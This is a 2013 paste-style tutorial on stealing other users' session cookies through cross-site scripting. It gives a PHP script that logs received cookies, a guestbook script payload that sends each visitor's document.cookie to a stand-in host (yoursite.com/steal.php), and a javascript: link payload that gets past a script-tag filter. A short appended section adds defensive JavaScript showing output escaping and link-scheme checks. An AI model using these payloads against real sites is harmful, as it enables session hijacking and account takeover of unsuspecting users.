zaitsev15

How To Steal A Cookie From A System

Jun 21st, 2013
Cookiestealing is one of the most fundamental aspects of XSS (cross-site scripting).

Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
javascript:alert(document.cookie)

After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. Here's an example of what might be in your cookie:

Code:
username=CyberPhreak; password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people's cookies, every user account is possibly compromised. You'll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users' cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I'll show you an example of a PHP script that accepts cookies:

Code:
<?php
// Read the "cookie" parameter from the query string.
$cookie = $_GET['cookie'];
// Open log.txt in append mode.
$log = fopen("log.txt", "a");
// Write the received value on its own line.
fwrite($log, $cookie . "\n");
fclose($log);
?>

And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case "cookie" in the URL, and then saves it to a file called "log.txt". For example:

Code:
http://yoursite.com/steal.php?cookie=

steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can't directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it's not easy, but it can be very simple.

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a "member profile", etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let's assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let's also assume that this website doesn't have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and JavaScript directly into your post in the guestbook. I'll give you an example of some code that we could put into a guestbook post that would send the user's cookie to our script:

Code:
<script>
document.location = "http://yoursite.com/steal.php?cookie=" + document.cookie;
</script>

Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you'd see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let's assume now that the administrator of this site got smart, and decided to filter out script tags. Now your code doesn't work, so we have to try and evade the filter. In this instance, it's easy enough:

Code:
<a href="javascript:void(document.location='http://yoursite.com/steal.php?cookie='+document.cookie)">Click Me</a>

In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.
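
Seen from the site owner's side, the two guestbook posts above show why removing script tags does not fix the problem, while encoding output and restricting link schemes does. This is an added example, not part of the original paste; the function names are hypothetical, and the two sample posts are constructed, harmless alert variants of the posts above.

```javascript
// Added example; the posts below are constructed test inputs.

// The filter from the text: remove <script> elements, leave everything else.
function stripScriptTags(post) {
  return post.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}

// Output encoding: every HTML metacharacter becomes an entity, so the
// browser shows the post as text whatever markup it contains.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// For user-supplied links: accept only absolute http(s) URLs.
function safeHref(url) {
  try {
    const u = new URL(String(url).trim());
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
  } catch {
    return null; // relative or unparsable input is rejected in this sketch
  }
}

// True if the fragment still contains something a browser parses as a tag.
function hasActiveContent(html) {
  return /<[a-z\/!]/i.test(html);
}

const POST_SCRIPT = "<script>alert(document.cookie)</script>";
const POST_LINK = '<a href="javascript:alert(document.cookie)">Click Me</a>';

// Compare the two defences on one guestbook post.
function compare(post) {
  return {
    activeAfterTagFilter: hasActiveContent(stripScriptTags(post)),
    activeAfterEscaping: hasActiveContent(escapeHtml(post)),
  };
}

console.log("script post:", compare(POST_SCRIPT));
console.log("link post:  ", compare(POST_LINK));
console.log("href check: ", safeHref("javascript:alert(document.cookie)"));
```

The tag filter leaves the link post active, while the escaped output contains no markup for either post, and the scheme check rejects the javascript: link target.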